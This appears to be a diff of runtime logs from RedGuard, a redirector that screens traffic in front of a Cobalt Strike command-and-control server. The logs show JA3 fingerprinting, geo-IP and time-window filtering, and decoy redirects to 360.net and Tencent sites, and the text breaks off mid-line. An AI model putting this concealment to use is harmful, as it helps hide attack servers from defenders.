[RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ -[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c -[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:13] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:36:13] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ -[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c -[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:13] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:36:13] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ -[2022-06-01 15:36:14] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c -[2022-06-01 15:36:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:14] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:36:14] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ -[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c -[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:24] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 -[2022-06-01 15:36:24] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: dfa1a04d7a3940d1792725df93f81719 -[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:24] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 -[2022-06-01 15:36:24] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 1b550bbdde0f6511638eb52cd2ef9787 -[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://tencent.com/ -[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: c0fc8d2a3090cfd5c5a4d6a027c0d9ee -[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:25] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 -[2022-06-01 15:36:25] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: c21234fe03e9149213ede6ecf6333853 -[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:26] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 -[2022-06-01 15:36:26] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 9d92b5b69ad7e3ba6732b092276f2a40 -[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:26] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:26] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 -[2022-06-01 15:36:26] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:52] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: a1cf9cd9cf6ecfd42459643454d3d409 -[2022-06-01 15:36:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:53] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-06-01 15:36:53] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:54] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0294d48ead6646ccd3446c0d79b953d4 -[2022-06-01 15:36:54] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:54] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:54] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-06-01 15:36:54] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: b9ddaf9bf0f00f86749f6e8b83b759ec -[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:55] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-06-01 15:36:55] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: ab6c50ef473b76a2aaf48bd06d20f8e1 -[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:55] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:55] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-06-01 15:36:55] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:37:00] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 34bab37e854f9e9afb68e9a98bef9c81 -[2022-06-01 15:37:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:37:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:37:01] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-06-01 15:37:01] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:37:12] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 -[2022-06-01 15:37:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:37:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:37:12] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 161 -[2022-06-01 15:37:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://tencent.com/ -[2022-06-01 15:37:28] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 -[2022-06-01 15:37:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:37:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:37:28] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:37:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://yun.tencent.com -[2022-06-01 15:37:30] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 -[2022-06-01 15:37:30] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:37:30] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:37:30] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:37:30] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://yun.tencent.com -[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 -[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:37:40] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ -[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 -[2022-06-01 15:37:40] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:37:41] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ -[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 0bc598b11dd90ca04efaf1442167fc24 -[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:37:41] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:37:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ +[2022-05-23 10:34:36] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-23 10:34:36] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +[2022-05-23 10:34:36] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-23 10:34:36] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-23 10:34:57] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:34:57] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 111.14.218.206 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.53 +[2022-05-23 10:34:57] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net +[2022-05-23 10:35:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:35:52] [RedGuard/core.IPLookUp] { + "status": "0", + "t": "", + "set_cache_time": "", + "data": [ + { + "ExtendedLocation": "", + "OriginQuery": "111.14.218.206", + "appinfo": "", + "disp_type": 0, + "fetchkey": "111.14.218.206", + "location": "山东省济南市 移动", + "origip": "111.14.218.206", + "origipquery": "111.14.218.206", + "resourceid": "6006", + "role_id": 0, + "shareImage": 1, + "showLikeShare": 1, + "showlamp": "1", + "titlecont": "IP地址查询", + "tplt": "ip" + } + ] +} +[2022-05-23 10:35:52] [RedGuard/core.ProxyFilterManger] [DROP] 111.14.218.206 Does not meet the allowed online geographical restrictions +[2022-05-23 10:35:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net +[2022-05-23 10:36:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:36:36] [RedGuard/core.ProxyFilterManger] [DROP] 111.14.218.206 request online IP address is not whitelisted +[2022-05-23 10:36:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net +[2022-05-23 10:37:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:37:14] [RedGuard/core.ProxyFilterManger] [DROP] 111.14.218.206 Requests are made during prohibited periods of time +[2022-05-23 10:37:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net +[2022-05-23 10:37:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-23 10:37:36] [RedGuard/core.ProxyFilterManger] [DROP] 111.14.218.206 Requests are made during prohibited periods of time +[2022-05-23 10:37:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 111.14.218.206 -> Destination Site: https://360.net +[2022-05-23 10:39:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:39:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - +[2022-05-23 10:39:05] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 +[2022-05-23 10:39:09] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:39:09] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - +[2022-05-23 10:39:09] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 +[2022-05-23 10:39:09] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36 +[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 +[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36 +[2022-05-23 10:39:10] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 +[2022-05-23 10:39:16] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:39:16] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 198.135.57.147 - Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.0 Safari/537.36 +[2022-05-23 10:39:16] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 198.135.57.147 +[2022-05-23 10:39:50] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:39:50] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - +[2022-05-23 10:39:50] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 +[2022-05-23 10:39:58] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:39:58] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - +[2022-05-23 10:39:58] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 +[2022-05-23 10:39:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:39:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36 +[2022-05-23 10:39:59] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 +[2022-05-23 10:40:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:40:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36 +[2022-05-23 10:40:00] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 +[2022-05-23 10:40:07] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-23 10:40:07] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 45.67.223.118 - Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0 +[2022-05-23 10:40:07] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 45.67.223.118 +[2022-05-23 10:47:30] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-23 10:47:30] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +[2022-05-23 10:47:30] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-23 10:47:30] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-23 10:48:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-23 10:48:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-23 10:50:03] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-23 10:50:03] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +[2022-05-23 10:50:03] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-23 10:50:03] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-23 10:50:04] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-23 10:50:04] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-23 10:50:17] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-23 10:50:39] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-23 10:50:39] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +[2022-05-23 10:50:39] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-23 10:50:39] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-23 10:50:47] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-23 10:50:47] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-23 10:50:47] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-23 10:51:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-23 10:51:36] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-23 10:51:36] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-23 10:51:41] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-23 10:51:41] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +[2022-05-23 10:51:41] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-23 10:51:41] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-23 10:51:42] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-23 10:51:42] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-23 10:51:42] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-23 11:03:06] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-23 11:03:06] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +[2022-05-23 11:03:06] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-23 11:03:06] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-23 11:03:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-23 11:03:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-23 11:03:08] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-23 11:03:26] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-23 11:03:26] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"} +[2022-05-23 11:03:26] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-23 11:03:26] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-23 11:03:27] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-23 11:03:27] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 16:12:02] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:12:02] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:12:02] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 16:12:02] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:12:17] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:12:18] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:38:48] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:38:48] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:38:48] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 